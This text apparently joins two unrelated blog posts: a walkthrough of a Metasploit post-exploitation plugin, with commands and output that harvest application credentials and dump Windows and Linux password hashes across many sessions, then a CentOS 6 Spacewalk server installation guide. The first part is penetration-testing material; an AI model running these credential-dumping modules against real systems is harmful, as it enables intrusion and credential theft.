mkdir ~/Development

After this you can clone the repos in to this folder:

cd ~/Deveolpment
git clone https://github.com/darkoperator/Metasploit-Plugins.git msf_plugins
git clone https://github.com/darkoperator/Meterpreter-Scripts.git msf_modules

Now we can link the modules to our ~/.msf4 directory so we can use them transparently with any instance of the framework we might be running on the machine:

ln -s ~/Development/msf_plugins/ ~/.msf4/plugins
ln -s ~/Development/msf_modules/ ~/.msf4/modules

To keep them updated is just a simple git pull in each directory to get the latest changes and bug fixes.

• Provide a way to run post modules where I could select the sessions to run the modules against.
• Do not pollute the datastore with Global variables like it would be needed with a resource file.
• Check that thee session is a compatible one before running the module.
• Allow to automate some of the most common tasks like password collection from applications and the OS user credentials.
• Allow the setting os several variables per module in a resource file in an easy manner so each module could be executed in a manner that would produce the best results.

To use the plugin you only need to download it from my GitHub account and place it in either ~.msf/plugins or in you Metasploit root folder plugins directory for use, sadly at the moment of this writing the tab completion for when loading the plug in will only work if the plugin is on the Metasploit plugins folder of the install and not the hidden home folder.

Sessions that will be used for showing the plugin usage:

msf  exploit(handler) > sessions -l

Active sessions
===============

Id  Type                   Information                                      Connection
--  ----                   -----------                                      ----------
1   shell linux                                                             192.168.1.100:4448 -> 192.168.1.229:47760
2   meterpreter x86/win32  TEST-01BCDAF47C\Administrator @ TEST-01BCDAF47C  192.168.1.100:4444 -> 192.168.1.113:1858
3   meterpreter x86/win32  WIN-YR4V852V71Y\Administrator @ WIN-YR4V852V71Y  192.168.1.100:4444 -> 192.168.1.156:49183
4   shell windows          Microsoft Windows [Version 6.1.7601]             192.168.1.100:4447 -> 192.168.1.225:49582
5   shell linux                                                             192.168.1.100:4448 -> 192.168.1.119:33595

Loading the module:

msf  exploit(handler) > load pentest 
postauto plugin loaded.
[*] Successfully loaded plugin: pentest

The Post Exploitation commands addd are:

Postauto Commands
=================

    Command             Description
    -------             -----------
    app_creds           Run application password collection modules against specified sessions.
    multi_cmd           Run shell command against several sessions
    multi_meter_cmd     Run a Meterpreter Console Command against specified sessions.
    multi_meter_cmd_rc  Run resource file with Meterpreter Console Commands against specified sessions.
    multi_post          Run a post module against specified sessions.
    multi_post_rc       Run resource file with post modules and options against specified sessions.
    sys_creds           Run system password collection modules against specified sessions.

Lets take a look at the app_creds command, this command will run all post exploitation modules that gather credentials from installed applications, first lets take a look at the options it provide:

msf  exploit(handler) > app_creds -h

OPTIONS:

    -h        Command Help
    -s <opt>  Sessions to run modules against. Example <all> or <1,2,3,4>

The options are quite simple we can tell it what sessions we want to run in a comma separated list or just type 'all' and have it run against all sessions. Lets run it against all the current sessions:

msf > app_creds -s all

Running windows/gather/credentials/wsftp_client against 2

[*] Checking Default Locations...
[*] C:\Documents and Settings\Administrator\Application Data\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Documents and Settings\Administrator\Application Data\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....

Running windows/gather/credentials/wsftp_client against 3
[*] Checking Default Locations...
[*] C:\Users\charlie\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\charlie\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....

Running windows/gather/credentials/winscp against 2
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!

Running windows/gather/credentials/winscp against 3
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!
………

Running multi/gather/filezilla_client_cred against 4
[*] No users found with a FileZilla directory

Running multi/gather/filezilla_client_cred against 5
[*] Checking for FileZilla Client profile in: /home/carlos
[*] Checking for FileZilla Client profile in: /home/lost+found
[*] Checking for FileZilla Client profile in: /root
[*] No users found with a FileZilla directory

The command will run each module sequentially against the current sessions, output of each of the commands is shown as they are executed. The credential harvesting post modules save their results in the credentials table. To look at the just issue the command creds, another thing is that the target host for this credentials are also stored in the hosts table:

msf  exploit(handler) > creds

Credentials
===========

host          port  user    pass      type      active?
----          ----  ----    ----      ----      -------
1.1.1.1       21    carlos  marta     password  true
10.10.1.1     21    test    tessqwwe  password  true
10.10.10.10   21    msf     test      password  true
10.10.10.100  22    test    resroass  password  true
192.168.1.1   21    msf     test      password  true

[*] Found 5 credentials.
msf  exploit(handler) > hosts 

Hosts
=====

address        mac  name             os_name            os_flavor  os_sp  purpose  info  comments
-------        ---  ----             -------            ---------  -----  -------  ----  --------
1.1.1.1                                                                                  
10.10.1.1                                                                                
10.10.10.10                                                                              
10.10.10.100                                                                             
192.168.1.1                                                                              
192.168.1.115       CARLOS-192FCD91  Microsoft Windows  XP         SP3    client

The next command for gathering information is the sys_creds, this command will choose the appropriate credential dumping command depending on the sessions type and OS, in the case of windows system it will attempt to get system privilege to be able to dump the hashes, they to can be found in the creds table and in loot. Options:

msf  exploit(handler) > sys_creds -h

OPTIONS:

    -h        Command Help
    -s <opt>  Sessions to run modules against. Example <all> or <1,2,3,4>

Running the command:

msf  exploit(handler) > sys_creds -s all

...

Running windows/gather/smart_hashdump against 1
[*] Running module against CARLOS-192FCD91
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /Users/carlos/.msf4/loot/20120125082528_default_192.168.1.115_windows.hashes_690213.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM privilege
[+] Got SYSTEM privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY f228f68360a9fbdd929f311d27192e90...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
[+]     HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

Running windows/gather/smart_hashdump against 2
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /Users/carlos/.msf4/loot/20120125082534_default_192.168.1.113_windows.hashes_233919.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM privilege
[+] Got SYSTEM privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::

Running linux/gather/hashdump against 3
[+] root:$1$1lQhcdo0$QpqLgMYl1r4nerxr9GQDn0:0:0:root:/root:/bin/bash
[+] nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
[+] vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
[+] oprofile:!!:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
[+] pcap:!!:77:77::/var/arpwatch:/sbin/nologin
[+] ntp:!!:38:38::/etc/ntp:/sbin/nologin
[+] dbus:!!:81:81:System message bus:/:/sbin/nologin
[+] avahi:!!:70:70:Avahi daemon:/:/sbin/nologin
[+] rpc:!!:32:32:Portmapper RPC user:/:/sbin/nologin
[+] apache:!!:48:48:Apache:/var/www:/sbin/nologin
[+] mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
[+] smmsp:!!:51:51::/var/spool/mqueue:/sbin/nologin
[+] sshd:!!:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
[+] xfs:!!:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
[+] rpcuser:!!:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
[+] nfsnobody:!!:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
[+] haldaemon:!!:68:68:HAL daemon:/:/sbin/nologin
[+] gdm:!!:42:42::/var/gdm:/sbin/nologin
[+] carlos:$1$1lQhcdo0$QpqLgMYl1r4nerxr9GQDn0:500:500:Carlos Perez:/home/carlos:/bin/bash
[+] Unshadowed Password File: /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.hashes_102504.txt

Running linux/gather/hashdump against 4
[-] You must run this module as root!

Looking at the gathered info using loot since system hashes are saved there:

msf  exploit(handler) > creds

Credentials
===========

host           port  user              pass                                                               type      active?
----           ----  ----              ----                                                               ----      -------
...
192.168.1.113  445   HelpAssistant     17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2  smb_hash  true
192.168.1.113  445   Administrator     bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203  smb_hash  true
192.168.1.113  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63  smb_hash  true
192.168.1.115  445   HR                44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4  smb_hash  true
192.168.1.115  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e  smb_hash  true
192.168.1.115  445   HelpAssistant     4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392  smb_hash  true
192.168.1.115  445   Administrator     bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203  smb_hash  true

[*] Found 12 credentials.
msf  exploit(handler) > loot

Loot
====

host           service  type                          name                              content     info                                path
----           -------  ----                          ----                              -------     ----                                ----
192.168.1.113           windows.hashes                TEST-01BCDAF47C_hashes.txt        text/plain  Windows Hashes                      /Users/carlos/.msf4/loot/20120125082534_default_192.168.1.113_windows.hashes_233919.txt
192.168.1.115           windows.hashes                CARLOS-192FCD91_hashes.txt        text/plain  Windows Hashes                      /Users/carlos/.msf4/loot/20120125082528_default_192.168.1.115_windows.hashes_690213.txt
192.168.1.115           ie.cookies                    ie_cookies.txt                    text/plain  Internet Explorer Cookies           /Users/carlos/.msf4/loot/20120125081022_default_192.168.1.115_ie.cookies_091073.txt
192.168.1.115           ie.history                    ie_history.txt                    text/plain  Internet Explorer Browsing History  /Users/carlos/.msf4/loot/20120125081022_default_192.168.1.115_ie.history_338823.txt
192.168.1.115           windows.autologin.user.creds  windows-autologin-user-creds.csv  text/csv    Windows AutoLogin User Credentials  /Users/carlos/.msf4/loot/20120125080927_default_192.168.1.115_windows.autologi_357557.csv
192.168.1.115           imail.user.creds              imail_user_creds.csv              text/csv    Ipswitch iMail user credentials     /Users/carlos/.msf4/loot/20120125080951_default_192.168.1.115_imail.user.creds_495255.csv
192.168.1.119           linux.hashes                  unshadowed_passwd.pwd             text/plain  Linux Unshadowed Password File      /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.hashes_102504.txt
192.168.1.119           linux.passwd                  passwd.tx                         text/plain  Linux Passwd File                   /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.passwd_327705.txt
192.168.1.119           linux.shadow                  shadow.tx                         text/plain  Linux Password Shadow File          /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.shadow_914385.txt

The next command in the list if the multi_post command, this command allows the running of a specified post modules against a list of sessions or all sessions. The command will check that the options provided are correct during execution and will check that the module is compatible with the session before executing. Recently the option to do tab completion for the module name was added. The options are:

msf > multi_post -h

OPTIONS:

    -h        Command Help
    -m <opt>  Module to run against sessions.
    -o <opt>  Module options.
    -s <opt>  Sessions to run module against. Example <all> or <1,2,3,4>

Lets run the checkvm modules for windows and linux, in the output you will be able to see that the module only executed against those sessions that the module was compatible for:

msf > multi_post -m post/windows/gather/checkvm -s all
Loading windows/gather/checkvm
Running against 2

[*] Checking if CARLOS-192FCD91 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running against 3
[*] Checking if TEST-01BCDAF47C is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running against 4
[*] Checking if WINDEV01 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
msf > multi_post -m post/linux/gather/checkvm -s all
Loading linux/gather/checkvm
Running against 6

[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine
Running against 7
[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine

The other multi post command allow the running of modules against multiple session with options using a resource file, this allows you to have several resource files with options already pre-set for specific tasks, tab completion can be use for the resource file name:

msf > multi_post_rc -h

OPTIONS:

    -h         Command Help
    -rc <opt>  Resource file with space separate values <session> <module> <options>, per line.

The RC File:

msf > cat /tmp/checkvm.rc
[*] exec: cat /tmp/checkvm.rc

all post/windows/gather/checkvm
all post/linux/gather/checkvm

Running the RC file:

msf > multi_post_rc -rc /tmp/checkvm.rc 
all post/windows/gather/checkvm
Loading post/windows/gather/checkvm
Running Against 2

[*] Checking if CARLOS-192FCD91 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running Against 3
[*] Checking if TEST-01BCDAF47C is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running Against 4
[*] Checking if WINDEV01 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
all post/linux/gather/checkvm
Loading post/linux/gather/checkvm
Running Against 6
[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine
Running Against 7
[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine

When looking at running commands against sessions, there are 2 types of commands that can be executed, Shell commands and Meterpreter console command, for shell commands the multi_cmd command is available:

msf > multi_cmd -h

OPTIONS:

    -c <opt>  Shell command to run.
    -h        Command Help
    -p <opt>  Platform to run the command against. If none given it will run against all.
    -s <opt>  Comma separated list sessions to run modules against.

You can specify a platform for running the command (bsd, solaris, linux and win), the list of sessions and the command to be executed. On windows based system I recommend using the "cmd /c " format and for unix type systems to use the full path for the command, you need the wrap the command in quotes. Since post modules and scripts save their data to loot this command will do the same saving the command output and command ran in loot. Lets run ipconfig against all Windows sessions:

msf > multi_cmd -s all -p win -c "cmd /c ipconfig"
Running cmd /c ipconfig against session 2


Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.1.115
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
Running cmd /c ipconfig against session 3


Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.1.113
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
Running cmd /c ipconfig against session 4


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::9930:cb9f:3b7e:e92d%10
...

Tunnel adapter Local Area Connection* 9:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:4137:9e76:3422:1b95:3f57:fe65
   Link-local IPv6 Address . . . . . : fe80::3422:1b95:3f57:fe65%12
   Default Gateway . . . . . . . . . : ::

Lets run ifconfig against linux systems:

msf > multi_cmd -s all -p linux -c "/sbin/ifconfig -a "
Running /sbin/ifconfig -a  against session 6
eth0      Link encap:Ethernet  HWaddr 00:0C:29:97:CD:08  
          inet addr:192.168.1.119  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe97:cd08/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1297491 errors:1 dropped:0 overruns:0 frame:0
          TX packets:51870 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:205739082 (196.2 MiB)  TX bytes:4346662 (4.1 MiB)
          Interrupt:67 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1567 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1567 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2116526 (2.0 MiB)  TX bytes:2116526 (2.0 MiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

Running /sbin/ifconfig -a  against session 7
eth0      Link encap:Ethernet  HWaddr 00:0C:29:97:CD:08  
          inet addr:192.168.1.119  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe97:cd08/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1297495 errors:1 dropped:0 overruns:0 frame:0
          TX packets:51874 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:205739404 (196.2 MiB)  TX bytes:4348194 (4.1 MiB)
          Interrupt:67 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1567 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1567 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2116526 (2.0 MiB)  TX bytes:2116526 (2.0 MiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

For running Meterpreter console commands the multimetercmd command is available it will check if the session specified is a Meterpreter session or not before executing, there is also a resource driven version of the command also:

msf > multi_meter_cmd  -h

OPTIONS:

    -h        Command Help
    -c <opt>  Meterpreter Console Command to run against sessions.
    -s <opt>  Sessions to run Meterpreter Console Command against. Example <all> or <1,2,3,4>

Lets run sysinfo against all sessions:

msf > multi_meter_cmd  -s all -c sysinfo
Running command sysinfo against session 2
Computer        : CARLOS-192FCD91
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Running command sysinfo against session 3
Computer        : TEST-01BCDAF47C
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Running command sysinfo against session 4
Session 5 is not a Meterpreter session!
Session 6 is not a Meterpreter session!
Session 7 is not a Meterpreter session!

As it can be seen the plugin provide many manners to automate post-exploitation tasks during a pentest. As always I hope you find it useful and would love your feedback and any bug report for bugs found.

Configuring the Environment for Installing Spacewalk

Test that name resolution is working properly.

ping -c 3 `hostname`

The pings should be successful.

Install the spacewalk repository so it will be available when using yum for installing packages:

rpm -Uvh http://spacewalk.redhat.com/yum/1.5/RHEL/6/x86_64/spacewalk-repo-1.5-1.el6.noarch.rpm

Set the jpackage repository, specifically for version 5.0

cat > /etc/yum.repos.d/jpackage-generic.repo << EOF
[jpackage-generic]
name=JPackage generic
#baseurl=http://mirrors.dotsrc.org/pub/jpackage/5.0/generic/free/
mirrorlist=http://www.jpackage.org/mirrorlist.php?dist=generic&type=free&release=5.0
enabled=1
gpgcheck=1
gpgkey=http://www.jpackage.org/jpackage.asc
EOF

For CentOS 6 there is a specific version of selinux that is needed so the CR(Continous Release) Repository must be used

cat > /etc/yum.repos.d/cr.repo << EOF
[CR-repository]
name=CR Repository
baseurl=http://mirror.centos.org/centos/\$releasever/cr/\$basearch/
enabled=1
gpgcheck=1
EOF

Spacewalk requires a Java Virtual Machine with version 1.6.0 or greater. The EPEL Repository contains a version of the openjdk that works with Spacewalk. Other dependencies can get installed from EPEL as well. To get packages from EPEL just install this RPM:

rpm -Uvh http://download.fedora.redhat.com/pub/epel/6/i386/epel-release-6-5.noarch.rpm

At the time of this writing there is a bug with cobbler-web being installed in a Spacewalk server so to make sure it does not get installed it is set as an excluded package in the yum.conf file:

echo "exclude=cobbler-web" >> /etc/yum.conf

Installing Spacewalk

The version of Spacewalk we will be installing is the PostgreSQL version. For this we will need to install PostgreSQL Server and configure it.

Installing and Configuring PostgreSQL

We will use yum to install the database server:

yum install postgresql-server

Initialize the system master database:

service postgresql initdb

Start the service so we can connect to the server and configure it:

service postgresql start

Ensure that PostgresSQL server will start with the server when it is rebooted:

 chkconfig postgresql on

Create database, user, and plpgsql language there (Change the password variable to a secure one):

su - postgres -c 'PGPASSWORD=spacepw; createdb spaceschema ; createlang plpgsql spaceschema ; yes $PGPASSWORD | createuser -P -sDR spaceuser'

We configure the user to use md5 password to connect to that database. Put the lines like following to /var/lib/pgsql/data/pg_hba.conf before the all statements

local spaceschema spaceuser md5
host  spaceschema spaceuser 127.0.0.1/8 md5
host  spaceschema spaceuser ::1/128 md5

Then we reload PostgreSQL:

service postgresql reload

Configuring Firewall

We must configure the system firewall to allow connection to the necessary ports used by the different services used by Spacewalk.

• Port 80 and 443 for connection to Web Interface and client connections to the server.
• port 4545 for Spacewalk monitoring
• Port 5222 for push actions to client machines.
• Port 5269 for push actions to a Spacewalk Proxy.
• Port 69 UDP for TFTP if provisioning will be used.

The commands to configure the firewall are:

iptables -D INPUT -j REJECT --reject-with icmp-host-prohibited
iptables -A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 4545 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 5222 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 5269 -j ACCEPT
iptables -A INPUT -p tcp -m udp --dport 69 -j ACCEPT
iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited
service iptables save
service iptables restart

Installing the Spacewalk Package

Once all dependencies have been configured we can install the spacewalk package issuing the yum command to install the PostgreSQL version, during installation we will have to accept several GPG keys for the repositories that where configured to meet the dependencies:

yum -y install spacewalk-postgresql

Initial Spacewalk Configuration

The best way to configure spacewalk is thru the use of a configuration file. The following is an example that can be modified for initial configuration (Make the necessary changes for your environment):

admin-email = root@localhost
ssl-set-org = Spacewalk Org
ssl-set-org-unit = spacewalk
ssl-set-city = My City
ssl-set-state = My State
ssl-set-country = US
ssl-password = spacewalk
ssl-set-email = root@localhost
ssl-config-sslvhost = Y
db-backend=postgresql
db-name=spaceschema
db-user=spaceuser
db-password=spacepw
db-host=localhost
db-port=5432
enable-tftp=Y

Connect to the server to create the administrator account for the default organization.

Use Firefox, for some reason Internet Explorer and Google Chrome have problems when login in to the server with the created administrator account for the first time.

After we have created this account, the server is ready to be used for administering hosts.

Setting Software Channels

Once the first organization is created one can decide on a model of a centralized or decentralized organization. Red Hat has a great white paper for this RHN SATELLITE: BEST PRACTICES FOR MULTIPLE ORGANIZATIONS

The first step is to set a Base channel this channel will contain all base packages for a system. The first Base Channel that we will set will be the one for CentOS 6.0 the version of CentOS used for the Spacewalk Server. Follow this steps one logged in:

1. Click on Channels
2. Click on Manage Software Channels
3. Click on Manage Repositories
4. Click on Create New Repository

GPG Key import

Before we start one thing to alway keep in mind is that the Spacewalk Server will not deploy packages from any repository for which it does not have the GPG Public key used to sign the packages. These keys are placed in the root of the version of the repository that one will use. First we need to download these keys import them so as to get the key ID and Fingerprint for when setting the channel and they should also be imported using rpm on the Spacewalk server. For the base CentOS repository we download the keys to import them with GPG to get the key information:

mkdir repo_keys
cd repo_keys
curl -O http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6

Now that we have the key imported we can use the ID shown in the output to list the key fingerprint to add to the channel definition, also it is advised that we do an import from rpm. Create one channel per set of repositories so it is easier to manage the key:

gpg --list-keys --fingerprint C105B9DE
rpm --import http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6

We will follow these steps for the creation of all repositories for which we will crate a channel of.

Creating Repositories

We will create 2 Repositories for CentOS 6 the first one will be the base repository for CentOS the second will be the Updates. For the base system repository enter:

• Repository Labe - CentOS6-i386-Base
• Repository URL - http://mirror.facebook.net/centos/6/os/i386/
• Then click on Create Repository

For the updates repository enter:

• Repository Labe - CentOS6-i386-Updates
• Repository URL - http://mirror.facebook.net/centos/6/updates/i386/
• Then click on Create Repository

For the Spacewalk Client repository enter:

• Repository Labe - spacewalk-client-rhel6-i386
• Repository URL - http://spacewalk.redhat.com/yum/1.5/RHEL/6/i386/
• Then click on Create Repository

Lets create a repository for VMWare Tools for vSphere 5 if you are using VMWare for running Virtual Machines:

• Repository Labe - VMware-Tools-ESX-5.0-RHL6
• Repository URL - http://packages.vmware.com/tools/esx/5.0/rhel6/i386/index.html
• Then click on Create Repository

Creating Channels

We will create a new channel that will use both Repositories:

1. Click on Channels
2. Click on Manage Software Channels
3. Click on Create New Channel

Enter the Following Parameters:

• Channel Name - CentOS 6 32-bit
• Channel Label - centos6-i386
• Parent Channel - none
• Parent Channel Architecture - IA-33
• Yum Repository Checksum Type - sha256
• Channel Summary - 32-bit CentOS 6 channel
• Under Channel Access Control Select:
  • All users within your organization may subscribe to this channel.
  • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
• GPG key URL - http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6
• GPG key ID - C105B9DE
• GPG key Fingerprint - C1DA C52D 1664 E8A4 386D BA43 0946 FCA2 C105 B9DE
• Click on Create Channel

Assign the Repositories to the Channel:

• Click on Channels
• Click on Manage Software Channels
• Click on the name of the channel that was just created
• Click on Repositories
• Select the Repositories to be linked to the channel (CentOS6-i386-Base and CentOS6-i386-Updates)
• Click on Update Repositories

To Sync the repositories

• Click on Repositories under in the channel settings
• Click on Sync
• Click on Sync Now to start the synching process
• Select a scheduling option and interval and click on Schedule

The initial sync can take hours depending on the size of the repository and internet connection speed. Packages will begin to appear slowly on the channel package list as they are downloaded and synched.

Repeat the steps for the Spacewalk Client and the VMware Tools using the settings shown bellow.

SpaceWalk Client:

• Channel Name - Spacewalk Client 32bit RHL6
• Channel Label - spacewalk-client-32bit-rhl6
• Parent Channel - CentOS 6 32-bit
• Parent Channel Architecture - IA-33
• Yum Repository Checksum Type - sha1
• Channel Summary - Spacewalk Client 32bit for RHL6
• Under Channel Access Control Select:
  • All users within your organization may subscribe to this channel.
  • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
• GPG key URL - http://spacewalk.redhat.com/yum/RPM-GPG-KEY-spacewalk
• GPG key ID - 430A1C35
• GPG key Fingerprint - B6F4 CBE4 8B8F 45E1 85F8 34B2 9542 3D4E 430A 1C35

Assign the repository spacewalk-client-rhel6-i386 to the channel and set a sync schedule

VMWare Tools:

• Channel Name - VMware Tools RHL6 32bit ESX5
• Channel Label - rhl6-vm-32bit-esx5
• Parent Channel - CentOS 6 32-bit
• Parent Channel Architecture - IA-33
• Yum Repository Checksum Type - sha1
• Channel Summary - VMware Tools RHL6 32bit ESX5
• Under Channel Access Control Select:
  • All users within your organization may subscribe to this channel.
  • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
• GPG key URL - http://packages.vmware.com/tools/VMWARE-PACKAGING-GPG-KEY.pub
• GPG key ID - 66FD4949
• GPG key Fingerprint - 36E4 7E1C C4DC C5E8 152D 115C C0B5 E0AB 66FD 4949

Assign the repository Vmware-Tools-ESX-5.0-RHL6 to the channel and set a sync schedule

For more information on creating repos and synching them do take a look at: Uploading Content

Enable the OSA Dispatcher so we can push jobs imediatly to registered systems:

chkconfig osa-dispatcher on
service osa-dispatcher start

Connecting a CentOS 6 System

Before connecting to a CentOS 6 System you need to create an activation key to use for registering the systems and assign a software channel to it. To create an Activation Key we do the following:

• Click on Systems
• Click on Activation Keys
• Click on Create New Key
• Enter the Following Information
  • Description - CentOS 6 i386 Systems
  • key - centos6-32bit
  • Base Channels - *CentOS 6 32-bit *
  • Add-On Entitlements - Select Monitoring and Provisioning (You can also choose the Virtualization Entitlements if you wish to use them)
• Click on Create Activation Key

The key is now ready to use.

To connect the system the appropriate client software must be installed on the system

We start by installing the appropriate repository for the spacewalk client software:

rpm -Uvh http://spacewalk.redhat.com/yum/1.5/RHEL/6/i386/spacewalk-client-repo-1.5-1.el6.noarch.rpm
rpm -Uvh http://download.fedora.redhat.com/pub/epel/6/i386/epel-release-6-5.noarch.rpm

Install the necessary client software:

yum install rhn-client-tools rhn-check rhn-setup rhnsd m2crypto yum-rhn-plugin osad

We can register the CentOS system to Spacewalk using the activation key we created earlier:

rhnreg_ks --serverUrl=http://YourSpacewalk.example.org/XMLRPC --activationkey=1-centos6-32bit

We need to configure OSAD so we can push actions to this system, we start by downloading the certificate and setting the certificate in the configuration file for OSAD:

cd /usr/share/rhn/
curl -O http://yourspacewalk.example.org/pub/RHN-ORG-TRUSTED-SSL-CERT
